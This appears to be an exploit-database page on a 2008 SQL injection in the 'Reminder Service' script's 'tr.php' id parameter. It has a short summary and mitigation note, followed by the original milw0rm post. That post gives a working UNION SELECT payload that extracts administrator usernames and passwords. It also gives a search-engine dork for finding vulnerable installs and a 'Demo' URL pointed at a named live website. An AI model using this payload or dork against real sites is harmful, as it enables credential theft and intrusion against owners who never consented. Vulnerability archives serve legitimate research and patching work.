header-logo
Suggest Exploit
vendor:
Reminder Service
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Reminder Service
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Reminder Service (id) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'id' parameter in 'tr.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information. For example, an attacker can inject the following payload: tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is recommended to use parameterized queries instead of dynamic queries.
Source

Exploit-DB raw data:

Reminder Service ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/reminder.php

DorK   :  inurl:tr.php?id= Reminder Service

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--



Demo :
_______


http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--





Greetz : All my freind

# milw0rm.com [2008-11-01]